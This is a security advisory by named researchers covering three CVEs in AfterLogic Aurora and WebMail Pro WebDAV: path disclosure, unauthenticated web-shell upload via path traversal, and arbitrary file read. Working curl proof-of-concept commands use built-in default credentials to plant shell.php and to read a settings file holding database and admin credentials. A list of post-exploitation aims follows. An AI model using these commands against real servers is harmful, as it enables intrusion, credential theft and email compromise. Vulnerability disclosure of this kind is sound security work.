AfterLogic 多个安全漏洞（CVE-2021-26292 CVE-2021-26293 CVE-2021-26294）

# **CVE-2021-26292** - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint **The severity of the issue:** Medium **Complexity:** Easy **Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO **Authentication:** Not required **Attacks:** Full Path Disclosure ## **Resources :** - https://owasp.org/www-community/attacks/Full_Path_Disclosure - https://owasp.org/www-community/attacks/Path_Traversal ## **Authors :** - Emre KELEŞ - @emrekeles on twitter [](https://twitter.com/emrekeles) - Emircan YILDIZ - @scorpsec on twitter [](https://twitter.com/scorpsec) - Halil Emre ÖZEN - @halilemreozen on twitter [](https://twitter.com/halilemreozen) ## **Report Summary :** AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “**caldav_public_user@localhost**” and it’s the predefined password “**caldav_public_user**” allows the attacker to obtain web root path. ## **To Reproduce :** Get the web root path with the following curl command ``` curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021" ``` ## **Response :** ``` <?xml version="1.0" encoding="utf-8"?> <d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns"> <s:exception>Sabre\DAV\Exception\NotFound</s:exception> <s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message> </d:error> ``` In this scenario : **/var/www/html/www/webmailpro.dev** is the web root path, this data is especially becomes valuable for the file upload vulnerabilities. ## **Technical Description:** - dav\server.php (handles the request, create the \afterlogic\DAV\Server instance ) - \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod) - \libraries\Sabre\DAV\server.php -> invokeMethod - \libraries\Sabre\DAV\server.php -> httpDelete - \libraries\Sabre\DAV\Tree.php -> delete - \libraries\Sabre\DAV\ObjectTree.php -> getNodeForPath - \libraries\Sabre\DAV\FS\Directory.php -> getChild Get web root path vulnerability starts on step 7 / getChild, at the \Sabre\DAV\Exception\NotFound('File with name ' . $path . ' could not be located') line **$path** variable contains web root path With the above problem any loggable user can obtain web root path, with the caldav_public_user@localhost user, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible. # **CVE-2021-26293** - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint **Base Score:** 9.8 CRITICAL **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H **Complexity:** Easy **Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO **Authentication:** Not required **Attacks:** Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function **Gained Access:** WebServer user ( Apache, Nginx, Etc… ) ## **Resources:** - https://owasp.org/www-community/attacks/Full_Path_Disclosure - https://owasp.org/www-community/attacks/Path_Traversal - https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload ## **Authors:** - Emre KELEŞ - @emrekeles on twitter [](https://twitter.com/emrekeles) - Emircan YILDIZ - @scorpsec on twitter [](https://twitter.com/scorpsec) - Halil Emre ÖZEN - @halilemreozen on twitter [](https://twitter.com/halilemreozen) ## **Report Summary:** AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP PUT request to WebDAV EndPoint with built-in “**caldav_public_user@localhost**” and it’s the predefined password “**caldav_public_user**” allows the attacker to create/overwrite files with malicious files such as web shells or database dumpers, etc. After uploading a malicious PHP file to the web server, some example actions that the attacker can do; 1. Download / Modify the database 1. Email addresses with easily decodable passwords 2. CalDAV data ( Calendars of the users ) 3. CardDAV data ( Contacts of the users ) 2. Download user uploaded private WebDAV files. 3. Intercept to read/modify emails of webmail users. 1. A way to read emails because webmail servers usually are whitelisted on mail servers while normal clients have thresholds 2. A good way to spread malicious executables/mails to users without struggling mail gateways/spam blockers. 3. Acting like the real user and sending vicious emails to important users/companies 4. Sending bulk emails for spam campaigns. 4. Try to privilege escalation to get the root/administrator server. Etc... ## **To Reproduce:** Upload the malicious file with the following curl command ``` curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php" ``` As the AfterLogic WebMail Pro docs mentioned “the web root usually looks like /var/www/html” and at the above PoC assumes files are located under apache’s standard /var/www/html path, it may differ due to configuration but it’s not a block for the attacker because we realized that some of the EndPoints expose the document root path when the invalid path parameter requested. Ways to figure out document root directory on customized web server configurations; 1. Using invalid path to get SabreDAV error which gives full path disclosure of the path to the webroot. ``` curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021" ``` 1. Trying to common web server paths 2. Brute force ( append new ../ to the URL, until getting HTTP 200 for the uploaded malicious file. ) ## **Technical Description:** - dav\server.php (handles the request, create the \afterlogic\DAV\Server instance ) - \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod) - \libraries\Sabre\DAV\server.php -> invokeMethod - \libraries\Sabre\DAV\server.php -> httpPut - \libraries\Sabre\DAV\FS\File.php -> put Unrestricted Upload of File with Dangerous Type, Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension which with that way attacker able to write upper directories and execute the malicious file With the above problem any loggable user can uploads malicious files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible. # **CVE-2021-26294** - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint **Base Score:** 7.5 HIGH **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N **Complexity:** Easy **Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO **Authentication:** Not required **Attacks:** Directory Traversal, Public Built-in Credentials For Critical Function ## **Resources :** https://owasp.org/www-community/attacks/Path_Traversal ## **Authors :** - Emre KELEŞ - @emrekeles on twitter [](https://twitter.com/emrekeles) - Emircan YILDIZ - @scorpsec on twitter [](https://twitter.com/scorpsec) - Halil Emre ÖZEN - @halilemreozen on twitter [](https://twitter.com/halilemreozen) ## **Report Summary :** AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root. ## **To Reproduce :** Read any file with the following curl command ``` curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml" ``` The sample curl command will get the license key, database credentials, admin panel credentials, etc ## **Technical Description:** - dav\server.php (handles the request, create the \afterlogic\DAV\Server instance ) - \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to * invokeMethod) - \libraries\Sabre\DAV\server.php -> invokeMethod - \libraries\Sabre\DAV\server.php -> httpGet Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension when it’s combined the httpGet business login ( reading file content and returning ) the attacker able to read any file under the webroot. With the above problem any loggable user can read configuration files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.